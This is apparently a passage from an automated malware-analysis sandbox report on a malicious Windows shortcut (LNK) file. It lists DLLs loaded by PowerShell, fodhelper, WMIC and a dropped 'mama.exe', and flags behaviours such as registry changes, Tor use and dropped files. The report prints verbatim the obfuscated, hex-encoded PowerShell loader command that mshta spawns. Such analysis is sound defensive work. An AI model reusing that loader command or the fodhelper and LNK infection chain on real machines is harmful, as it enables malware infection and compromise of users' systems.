          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: ieframe.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: netapi32.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: version.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: mlang.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: slc.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: netapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: winmmbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: mmdevapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: devobj.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: ksuser.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: avrt.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: audioses.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: powrprof.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: umpdc.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: msacm32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: midimap.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: rasapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: rasman.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: samcli.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: avifil32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: msvfw32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: cryptui.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: wtsapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: pstorec.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: propsys.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: winsta.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: firewallapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: fwbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: sxs.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: fwpolicyiomgr.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: vreFmptfUu.lnkLNK file: ..\..\..\Windows\System32\OpenSSH\ssh.exe
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FD
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDJump to behavior
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_03435340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,43_2_03435340
          Source: mama.exe.13.drStatic PE information: section name: .didata
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C15422B5 push eax; iretd 7_2_00007FF7C154233D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C15419A2 pushad ; ret 7_2_00007FF7C15419B1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF7BFC700BD pushad ; iretd 13_2_00007FF7BFC700C1

          Persistence and Installation Behavior

          barindex
          Windows shortcut file (LNK) starts blacklisted processes
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
          Uses cmd line tools excessively to alter registry or file data
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mama.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          May use the Tor software to hide its network traffic
          Source: mama.exe, 0000002B.00000003.1618824342.000000007E870000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: torConnect
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
